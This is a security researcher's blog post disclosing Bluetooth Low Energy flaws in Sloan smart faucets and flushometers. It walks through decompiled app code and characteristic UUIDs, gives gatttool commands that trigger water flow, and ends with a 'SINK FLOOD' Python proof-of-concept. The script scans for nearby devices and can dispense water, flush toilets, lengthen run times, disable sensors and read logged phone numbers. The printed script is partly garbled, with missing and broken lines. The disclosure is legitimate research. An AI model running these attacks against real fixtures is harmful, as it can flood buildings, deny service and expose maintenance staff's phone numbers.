Plumbing the Depths of Sloan’s Smart Bathroom Fixture Vulnerabilities

Ben Smith
Tenable TechBlog
Published in
20 min readJun 30, 2021

As I stood in line at my local donut shop, I idly began scanning nearby Bluetooth Low Energy (BLE) devices. There were several high-rises nearby, and who knows what interesting things lurk in those halls. Typically, I’ll see consumer technology like Apple products, fitness trackers, entertainment systems, but that day I saw something that piqued my interest… Device Name: FAUCET ADSKU01 A0174. A bluetooth… faucet?! I had to know more. Since I clearly did not own this particular device and also didn’t want to risk a flood, I went home and looked up all I could find about these SmartFaucets while greedily gobbling a glazed donut or two.

Device Name: FAUCET

The device ran in a line of SmartFaucets and Flushometers made by Sloan Valve Company. I had to find one I could use for testing. Their connected devices are Sloan SmartFaucets including Optima EAF, Optima ETF/EBF, BASYS EFX (these require an external adapter) and Flushometers such as SOLIS and can be viewed over at The app to connect to these devices is called SmartConnect and is available in the Google Play or Apple App stores.

An update to Sloan’s feature checklist

A Quick Bluetooth Glossary

Bluetooth Classic — This is the original Bluetooth protocol still widely used. Sometimes it will be referred to as “BR” or “EDR.” Devices are connected one to one.

Bluetooth Low Energy (BLE) — This is actually a different protocol from Bluetooth Classic. It has lower energy requirements, and devices can interoperate one-to-one, one-to-many, or even many-to-many. Almost everywhere we mention Bluetooth in this article, we mean BLE, and not Bluetooth Classic.

Services — Technically part of the “GATT” BLE layer, services are groupings of characteristics by function.

Characteristics — Part of the “GATT” BLE layer, characteristics are UUID/value pairs on a device. The value can be read, written to, and more, depending on permissions. Sometimes it’s helpful to think of them as UDP ports with (generally) very simple services.

UUIDs — Random numbers used to refer to services and characteristics. Some are assigned by the Bluetooth SIG, while others are set by the device’s manufacturer.

Sloan SmartConnect App

SmartConnect App has a button to “Dispense Water”

As its sole protection mechanism, the app requires a phone number prior to use and then sends a code to that number.

More SmartConnect app functionality

After that, quite an array of features are available. Let’s see what we can find out with an actual device.


Sloan EBF615–4 Internals

I managed to acquire a Sloan EBF615–4 Optima Plus, added batteries, and plugged in the faucet. When I wave my hand in front of the IR sensor, I can hear the clicking of the faucet mechanism allowing a potential flow of water to course through the spigot. This is good as I’ll have some way of knowing if we’re getting somewhere. I’d already installed the SloanConnect app, and registered with an actual phone number, so I was able to connect to the device.

Let’s start by using hcitool to scan for BLE devices nearby. Hcitool is a Linux utility for scanning for Bluetooth devices and interacting with our Bluetooth adapter. The ‘lescan’ option allows us to scan for Bluetooth Low Energy. The device we’re interested in is aptly named “FAUCET”.

pi@rpi4:~ $ sudo hcitool lescan | grep FAUCET08:6B:D7:20:00:01 FAUCET ADSKU02 A012108:6B:D7:20:00:01 FAUCET ADSKU02 A0121

Now that we know its MAC address, we can use gatttool, a Linux utility for interacting with BLE devices, to query the BLE services:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 — primaryattr handle = 0x0001, end grp handle = 0x0005 uuid: 00001800–0000–1000–8000–00805f9b34fbattr handle = 0x0006, end grp handle = 0x0009 uuid: 00001801–0000–1000–8000–00805f9b34fbattr handle = 0x000a, end grp handle = 0x000e uuid: 0000180a-0000–1000–8000–00805f9b34fbattr handle = 0x000f, end grp handle = 0x002d uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c900attr handle = 0x002e, end grp handle = 0x0031 uuid: 0000180f-0000–1000–8000–00805f9b34fbattr handle = 0x0032, end grp handle = 0x0050 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c910attr handle = 0x0051, end grp handle = 0x0081 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c920attr handle = 0x0082, end grp handle = 0x009d uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c940attr handle = 0x009e, end grp handle = 0x00a1 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c950attr handle = 0x00a2, end grp handle = 0x00ba uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c960attr handle = 0x00bb, end grp handle = 0x00d9 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c970attr handle = 0x00da, end grp handle = 0xffff uuid: 1d14d6ee-fd63–4fa1-bfa4–8f47b42119f0

and their characteristics:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 — characteristicshandle = 0x0002, char properties = 0x0a, char value handle = 0x0003, uuid = 00002a00–0000–1000–8000–00805f9b34fbhandle = 0x0004, char properties = 0x02, char value handle = 0x0005, uuid = 00002a01–0000–1000–8000–00805f9b34fbhandle = 0x00db, char properties = 0x08, char value handle = 0x00dc, uuid = f7bf3564-fb6d-4e53–88a4–5e37e0326063handle = 0x00de, char properties = 0x04, char value handle = 0x00df, uuid = 984227f3–34fc-4045-a5d0–2c581f81a153

Once we reverse the Android app, we can hopefully find variable names that reference these UUIDs and determine their function.

One thing I’ve noticed while doing this is that the device seems to stop beaconing every so often, and I need to either press a button on it OR wait a bit OR unseat and reseat the batteries. It’s possible that it limits connections over a period of time.

Let’s take a look back at the app.

SmartConnect Again

After pulling the app off of my phone using adb and then reversing it with jadx, I start searching for interesting bits. The first one to jump out was:

public final void dispenseWater() {    if (getMainViewModel().getConnectionState().getValue() == ConnectionState.CONNECTED) {
getMainViewModel() .getConnectionState() .setValue (ConnectionState.DISPENSING_WATER);
BluetoothGattCharacteristic bluetoothGattCharacteristic = getMainViewModel().getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE)); if (bluetoothGattCharacteristic != null) {
} FragmentActivity activity = getActivity(); if (activity != null) { BluetoothLeService bluetoothLeService = ((MainActivity) activity).getBluetoothLeService();
if (bluetoothLeService != null) {
bluetoothLeService. writeCharacteristic(bluetoothGattCharacteristic);
return; } return; } throw new TypeCastException(""null cannot be cast to non-null type com.smartwave.sloanconnect.MainActivity""); }}

Seems like it’ll be pretty easy to make this thing flow. Now we just need to figure out the BLE characteristic UUID referenced by UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. This is made incredibly easy thanks to a nice table of UUID variables.

public static final String UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = “d0aba888-fb10–4dc9–9b17-bdd8f490c954”;UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92a”;public static final StringUUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLUSH_ON_OFF = “d0aba888-fb10–4dc9–9b17-bdd8f490c946”;public static final StringUUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c942”;public static final StringUUID_CHARACTERISTIC_FAUCET_BD_STATISTICS_INFO_NUMBER_OF_ALL_FLUSHES = “d0aba888-fb10–4dc9–9b17-bdd8f490c916”;public static final StringUUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE = “f89f13e7–83f8–4b7c-9e8b-364576d88334”;public static final StringUUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = “f89f13e7–83f8–4b7c-9e8b-364576d88361”;

Wow. In addition to finding our water dispensing UUID, there are a lot of other interesting variable names. A select few of ~100 are shown above. It looks like this thing supports over-the-air (OTA) firmware updates, tons of diagnostic and sensor settings, possible security settings, and more.

Now that we know the UUID that turns on the water, let’s use NRF Connect to see what we can do. I’m switching over to NRF Connect from gatttool because it handles the connection easily. Since the faucet seems to ‘time out’ or disallow connections after a period of time, this is useful so we don’t lose our connection and reset everything.

The faucet’s BLE advertising information
nRF Connect for Desktop showing the faucet’s Services

In the decompiled ‘dispenseWater()’ function above, we saw that the function basically sends a ‘1’ to the UUID stored in the variable UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. Luckily we can find the UUID in the table we found:

public static final String UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE = “d0aba888-fb10–4dc9–9b17-bdd8f490c965”;

Cool. Let’s write to that UUID. The default value is 30, so, ‘0’ in ASCII. Let’s write 31, or ‘1’, since that’s what the code does. I tried writing other numbers first but nothing else did anything, until…

nRF Connect view showing flow being enabled.

I barely refrained from yelping for joy when I heard the faucet’s telltale ‘click’ indicating the spigot had activated. Since the faucet isn’t hooked up to a water source (hey, i’m not a plumber), you’ll have to bear with the above anti-climactic demo.

We should be able to do this with gatttool via:

$ sudo gatttool -b 08:6B:D7:20:00:01 — char-write-req -a 0x00b3 -n 31

Flush Toilet

Although I don’t have a smart Flushometer, it works very similarly to the faucet. We can see the code for “flushToilet()” is almost identical:

public static final void flushToilet(BluetoothLeService bluetoothLeService, MainViewModel mainViewModel) {    Intrinsics.checkParameterIsNotNull(bluetoothLeService, "$this$flushToilet");    Intrinsics.checkParameterIsNotNull(mainViewModel, "mainViewModel");    if (mainViewModel.getConnectionState().getValue() != ConnectionState.FLUSHING_TOILET) {        mainViewModel .getConnectionState() .setValue(ConnectionState.FLUSHING_TOILET);        BluetoothGattCharacteristic bluetoothGattCharacteristic = mainViewModel.getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE));        if (bluetoothGattCharacteristic != null) {            bluetoothGattCharacteristic.setValue("1");        }        bluetoothLeService .writeCharacteristic(bluetoothGattCharacteristic);    }}

And we can look up the UUID for the flush variable:

public static final String UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = “f89f13e7–83f8–4b7c-9e8b-364576d88361”;

Even though I don’t intend to acquire a smart Flushometer, I can confidently say I know what’s happening here.

Unlock Key

There seems to be a concept of an unlock key in the android app.

public final void setGattCharacteristics(List<? extends BluetoothGattService> list) {    DeviceData value;    if (list != null) {        for (T t : list) {            Timber.i(“Service: “ + t.getUuid(), new Object[0]);            List<BluetoothGattCharacteristic> characteristics = t.getCharacteristics();            Intrinsics .checkExpressionValueIsNotNull(characteristics, “service.characteristics”);            for (T t2 : characteristics) {                Map<UUID, BluetoothGattCharacteristic> map = this.gattCharacteristics;                Intrinsics.checkExpressionValueIsNotNull(t2, “characteristic”);                UUID uuid = t2.getUuid();                Intrinsics.checkExpressionValueIsNotNull(uuid, “characteristic.uuid”);                map.put(uuid, t2);                if (Intrinsics.areEqual(t2.getUuid(), UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY)) && (value = this.activeDeviceData.getValue()) != null) {                    value.setHasSecurity(true);                }            }        }    }}

The setGattCharacteristics function is called on connection to build the list of services and characteristics. Here, if there’s an unlock key set, the app marks a ‘security’ value as true. Later on this value is checked when a few functions are called, but so far it looks like it just appends some notes if it is set. In a few scenarios, a beginSecurityProtocol() function is called, and it will read a ‘note’ from the device if security is enabled. This ‘note’ can be used to store the phone number of the last person to change the setting. The security function seems to be more of a way to keep some data about what happened than any sort of actual security.

Flow Rate

The app has two different sets of code to protect flow rate from being set too high, depending on if we’re using Liters or Gallons.

if (doubleOrNull != null) {    d = doubleOrNull.doubleValue();}if ((valueOf.length() == 0) || d < 1.3d) {    d = 1.3d;} else if (d > 9.9d) {    d = 9.9d;}#OR:if ((valueOf.length() == 0) || d < 0.3d) {    d = 0.3d;} else if (d > 2.6d) {    d = 2.6d;}

Since this is implemented in the app, I’ll bet the faucet has a much wider range. Of course, flow rate is governed by whatever the line in can support (I’m not a plumber). Flow rate is governed by d0aba888-fb10–4dc9–9b17-bdd8f490c949 characteristic.

Flow Rate Value

It seems floats are written to the characteristic as two characters, in this case, 1 and 9 (1.9), which is one of the liters per minute (LPM) options. Let’s see what we can set it to.

So, we can’t set it to a 3 byte value, but we can set it to 0x3939 (9.9), and that seems to be the highest value to have any effect. Of note, we can also set it to even higher values like 0xFF39, and while that doesn’t seem to do anything, it still feels like a value that shouldn’t be allowed by logic on the device. Since I don’t have the faucet hooked up, I can’t test what happens when we set the flow rate really high (again, not a plumber). When it’s set to FF39, the app tries to display it as 0.0. And, we can set it to 9.9 via the app. So, Unless we plug this thing into a water line, we’re not gonna know what happens with the FF39.

Activation Mode

“Activation Mode” controls how long water flows for when the IR sensor is triggered. We can set it up to 120 seconds via the app. We’re all washing our hands a lot longer during covid, but I know I can sing happy birthday to myself 2 or three times and still be under that 2 minute mark. Can we set it higher and cause the faucet to flow for a really long time?

There are two types of Activation Mode: Metered and On Demand. What’s the difference between them? Surely the internet will tell me.

A Google Play Store comment indicating confusion on Metered and On Demand flow rate

Nope, no luck there. There are a few variable definitions that may give us a clue. Could that On Demand value be a mistake, off by an order of magnitude?

public final class ActivationModeFragmentKt {    private static final int METERED_MAX_VALUE = 120;    public static final int METERED_MODE = 1;    private static final int MIN_VALUE = 3;    private static final int ON_DEMAND_MAX_VALUE = 1200;    public static final int ON_DEMAND_MODE = 0;}

Unfortunately those safeguards don’t seem to be set anywhere else. Let’s see if we can find the code that controls this. Two different characteristics control the run times for the different modes.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME = “d0aba888-fb10–4dc9–9b17-bdd8f490c945”;public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME = “d0aba888-fb10–4dc9–9b17-bdd8f490c944”;public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION = “d0aba888-fb10–4dc9–9b17-bdd8f490c943”;
Flow Rate characteristics and values

And we can see how these are set on the device. I’m going to go ahead and assume that everything on this device is written as ascii. So, Mode is set to 0x30 == “0”, which we can see is ON_DEMAND_MODE. And then the Metered Run Time is set to 120 seconds, and On Demand is set to 30 seconds. Cool. Let’s see how high we can go. This is going to be painful, waiting for many minutes for this thing to turn back off.

The On Demand characteristic set to 1130 seconds

Ok, we’ve set the On Demand time to 1130 seconds, so, about 18 minutes. I wave my hand in front of the faucet’s IR sensor, and grab a cup of coffee. This is gonna take a while…. That didn’t work. It shut off quickly. There must be some internal idea of how long is too long. I’ll flip the mode to metered and set that pretty high. Seems metered won’t take more than 3 bytes, so I’ll set the first one to 9 for 920 seconds, or ~15 minutes. And then I’ll wait.

Metered Mode set to 920 seconds

It’s still going. There’s gotta be a better way to test. Currently, I wave my hand in front of the sensor once to engage the faucet, and then try periodically over the timer duration. It won’t make the click of engagement until the time is up. So, the next time I can wave my hand in front of the sensor and hear a click, I know the faucet’s timer has ended. This won’t be incredibly accurate or scientific. I set a 14 min timer and walked away. Annnnd somehow I walked right back in at the 15 minute mark and heard it click off. So, the highest value we can likely set for Metered mode is 999, which is 16.65 minutes. That’s a long time to leave the tap on. I wonder who would want to do something like that…

Wet Bandits — Be on the lookout — These criminals are armed and clumsy


In addition to causing a flood, we can trigger the opposite effect. It’s possible to disable the faucet’s sensor completely by setting the Sensor Range to 0. Now, the faucet won’t turn on no matter how close our hand gets or how vigorously we wave. In this case, we can simply send an 0x30 to UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE.

Model and Version

It’s also possible to read the model and version number via these characteristics. Nothing super exciting here, but could be useful if we were trying to find a specific version. Most BLE enabled devices will expose these via the “Device Information” service. These are separate from that and something Sloan must have thought necessary.

Firmware & Hardware
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c906”;public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c905”;

Firmware: 0109

Hardware: 0175

Logged Phone Numbers

The “security” mode of the faucet logs the phone number stored in the app for certain events.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c932”;public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c930”;public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92e”;public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92f”;public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = “d0aba888-fb10–4dc9–9b17-bdd8f490c929”;public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92b”;public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92a”;public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92c”;public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92d”;
Phone numbers stored on faucet

I’ve conveniently set these to the Tenable support number 855–267–7044. In a real setup, this would be the phone number registered in the app that performed each specific task update. I attempted to see how wide the field was, and got up to 15 characters before it wouldn’t take any more.

It doesn’t seem like the app is parsing anything in the text fields, so no XSS that I can find.

The other interesting thing here is that any time someone makes a change to the faucet, the app causes their phone number to be stored on the faucet. This is then reflected back to any app that connects OR anyone that reads the characteristic. This isn’t mentioned in the app and I don’t see a privacy policy. Does GDPR apply to bathroom fixtures?

Aquis Dongle

What is Aquis? I don’t know. But there are several characteristics in the app for an Aquis Dongle. Could this be a new product line? A partnership with another company that this app will work with?

public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c90e”;public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c90d”;public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE = “d0aba888-fb10–4dc9–9b17-bdd8f490c90c”;public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL = “d0aba888-fb10–4dc9–9b17-bdd8f490c90b”;public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = “d0aba888-fb10–4dc9–9b17-bdd8f490c90F”;

There does seem to be a company called Aquis that offers connected faucets. Perhaps they’re one of Sloan’s partners or produced the tech for Sloan.

Aquis Multifunctional Faucet feature sheet

That ‘optional service APP’ sounds just like what we’re looking at.

OTA Firmware Update

The service UUID 1d14d6ee-fd63–4fa1-bfa4–8f47b42119f0 maps to the variable name UUID_SERVICE_OTA in our variable definitions file. Indeed, a quick search reveals this to be Silicon Labs OTA service, giving us insight, also, into the chipset used here. We’ll have to dig into this.

OTA means “Over-The-Air” and is the method to write firmware to various BLE chipsets. As far as I can tell, the different major chipset manufacturers each have their own OTA spec, and they are not interoperable even if they’re called the same thing. Therefore it can be helpful to have chipset specific tools to manipulate OTA. There are often various levels of security that can be added by the developer, including checking firmware signatures or not.

Silicon Labs Gecko bootloader has 3 optional settings for secure firmware update:

  • Require signed firmware upgrade files.
  • Require encrypted firmware upgrade files.
  • Enable secure boot.

Silicon Labs defines these as:

  • Secure Boot refers to the verification of the authenticity of the application image in main flash on every boot of the device.
  • Secure Firmware Upgrade refers to the verification of the authenticity of an upgrade image before performing a bootload, and optionally enforcing that upgrade images are encrypted.

If none of those are selected by the developer, it’s possible to write any firmware to the device. As the faucet was quite expensive, I did not test firmware update and am merely pointing out that it’s exposed.

Using one of the SILabs android apps, we can quickly see that it’s possible to do an OTA firmware update. No telling what the firmware in place is checking for. I don’t want to break this thing yet.

I also grepped through the android apk but don’t see anything that references the three OTA variable names. I guess they’ll implement updates in the future. This makes me think that the OTA feature uses stock code from the SDK.

Hardware — BLE Adapters

These vulns should be exploitable via any BLE adapter, but since hardware can be finicky, the specific adapters I tested with are:

Cyberkinetic Effects or Why should I even care

Sure, turning on the water might not be the next million dollar ransomware campaign, and flushing the toilets remotely seems like a great prank, but not much more. Still, there can be real interesting effects. First off, these faucets aren’t usually for home use, but installed in office buildings, in groups. Turning on all of the faucets repeatedly or flushing all of the toilets could possibly cause a flooding condition. Move over SYN flood, this is a sink flood.

But these devices aren’t networked! They have no IP! They’re limited by range! These are great points. However, the faucet likely has a 30 foot BLE range. This is well within range of some miscreant standing at their local donut shop near the office. A neighboring unit in a condo or apartment building would also be well within range. Also, most laptops and desktops include bluetooth adapters, so any malware infection is a potential vector. I always like to point out that a BLE device is only a hop away from any modern laptop.


Enable Water Dispense > Kinetic Effect, Change Flow Rate > Kinetic Effect, Change Activation Mode / Time > Kinetic Effect / DoS, Change Sensor Range to 0 > DoS, Maintenance Person Cell Phone Number Modification and Disclosure > Information Leakage, Enable Toilet Flush > Kinetic Effect, Model Number is writable > Modification of Assumed Immutable Data

PoC || GTFlow

Here’s a quick proof of concept in case you’ve got an unpatched faucet or flushometer lying around. As of this posting, Sloan has not responded to our disclosure emails and to our knowledge has not released an update.

from bluepy.btle import Scanner, DefaultDelegate, Peripheral, UUID, BTLEDisconnectError, BTLEGattError, BTLEManagementError, BTLEInternalErrorSCAN_TIMEOUT = 2.0
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90F");
)UUID_CHARACTERISTIC_APP_IDENTIFICATION_LOCK_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c953");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c954");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_TIMESTAMP = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c951");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c952");

UUID_CHARACTERISTIC_OTA_CONTROL = UUID("f7bf3564-fb6d-4e53-88a4-5e37e0326063");
UUID_CHARACTERISTIC_OTA_DATA_TRANSFER = UUID("984227f3-34fc-4045-a5d0-2c581f81a153");
OTA = (
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_1 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94a");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_2 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94b");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_3 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94c");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_4 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94d");
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_SOLAR_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c968");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_INIT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c961");
DIAG = (
UUID_CHARACTERISTIC_FAUCET_BD_BATTERY_LEVEL = UUID("00002a19-0000-1000-8000-00805f9b34fb");
"0": ("Dispense Water", UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE, "Enter a 1 to begin Dispensing water: "),
"1": ("Flush Toilet", UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE, "Enter a 1 to begin flushing diagnostic: "),
"2": ("Change Faucet Flow Rate", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLOW_RATE, "Enter two digits together, they'll be a float (11 will be 1.1lpm): "),
"3": ("Change Faucet Activation Mode", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION, "Enter a 0 (ondemand) or a 1 (metered) to change the activation mode.: "),
"4": ("Change Faucet OnDemand Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME, "Enter 2 digits (10 = 10 seconds): "),
"5": ("Change Faucet Metered Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME, "Enter 3 digits (120 = 120 seconds): "),
"6": ("Change Sensor Range", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE, "Enter 1 digit (0 to disable sensor): "),
"7": ("Read Maintenance Personnel Info", FAUCET_PHONE_UUIDS, "N/A"),
"8": ("Change Model Number", UUID_CHARACTERISTIC_FAUCET_BD_DEVICE_INFO_MODEL_NUMBER, "Enter a new model number: "),
"9": ("OTA (doesn't write)", OTA, "N/A"),
"12": ("Read AQUIS Info", AQUIS_UUIDS, "N/A"),
"13": ("Read Locking Information", LOCK_INFO, "N/A"),
"14": ("Read Diagnostic Info", DIAG, "N/A"),
"15": ("Read NOTES", NOTES, "N/A"),
"16": ("Write NOTES", NOTES, "Enter something to write to the 4 notes fields:"),
"17": ("Production Enable", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_PRODUCTION_ENABLE, "Write something to production enable: "),
"18": ("Adaptive Sensing Enable (gain/sensitivity changes not implemented)", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_ADAPTIVE_SENSING_ENABLE, "Write to Adaptive Sensing Enable: "),
"19": ("Read Battery Info", BATTERY_INFO, "N/A"),
class ScanDelegate(DefaultDelegate):
def __init__(self):
#def handleDiscovery(self, dev):
#if dev
def convert_num_for_writing(text):
if len(text) > 4:
return text.encode()
output = b''
#for letter in text:
# output = output + str(hex(ord(letter)))[2:4].encode()
output = text.encode()
return outputdef run_sink_flood(attack, target, p):
attack_name = attack[0]
uuid = attack[1]
text = attack[2]
target_name = target["name"]
if type(uuid) == UUID:
char = p.getCharacteristics(uuid=uuid)
if char[0].supportsRead() and attack_name != "Dispense Water":
val = char[0].read()
print(f"[ >] {target_name} responds with current value: {val}")
if not text == "N/A":
sendme = input(text)
sendme = convert_num_for_writing(sendme)
char[0].write(sendme, withResponse=True)
for i in uuid:
char = p.getCharacteristics(uuid=i)
if char[0].supportsRead():
val = char[0].read()
print(f"[ >] {target_name} responds with current value: {val}")
if not text == "N/A":
sendme = input(text)
sendme = convert_num_for_writing(sendme)
char[0].write(sendme, withResponse=True)
except BTLEGattError:
def menu_pick_attack(target):
for attack in ATTACKS_DICT.keys():
print(f"[{attack}] {ATTACKS_DICT[attack][0]}")
selection = input("Enter a #: ")
return ATTACKS_DICT[selection]
def menu_pick_device(devices):
menu = {}
i = 1
target = None
for dev in devices:
for (adtype, desc, value) in dev.getScanData():
if desc == "Complete Local Name":
if type(value) == str and "FAUCET" in value:
menu["%s" % i] = {"name": value,"dev": dev}
i += 1
options = menu.keys()
if not options:
return None
for entry in options:
print(f"[{entry}] {menu[entry]['dev'].addr} {menu[entry]['name']} ")
selection = input("Enter a device #: ")
if selection in menu.keys():
target = menu[selection]
return target
def lescan():
scanner = Scanner(1).withDelegate(ScanDelegate())
print(f"[*] scanning for {SCAN_TIMEOUT}")
devices = scanner.scan(SCAN_TIMEOUT)
except BTLEManagementError:
print("[*] Permission to use HCI unavailable, rerun with sudo or as root.")
return devices
def main():
print("[*] starting SINK FLOOD Sloan SmartFaucet and SmartFlushometer tool")
while True:
found_devices = lescan()
if found_devices:
target = menu_pick_device(found_devices)
if not target:
p = Peripheral(target['dev'].addr)
#p = Peripheral('08:6b:d7:20:9d:4b')
while target:
attack = menu_pick_attack(target)
run_sink_flood(attack, target, p)
print("[*] target not found. have you tried turning it off and on again?")
print("[*] something's not write. exiting.")
if __name__ == "__main__":

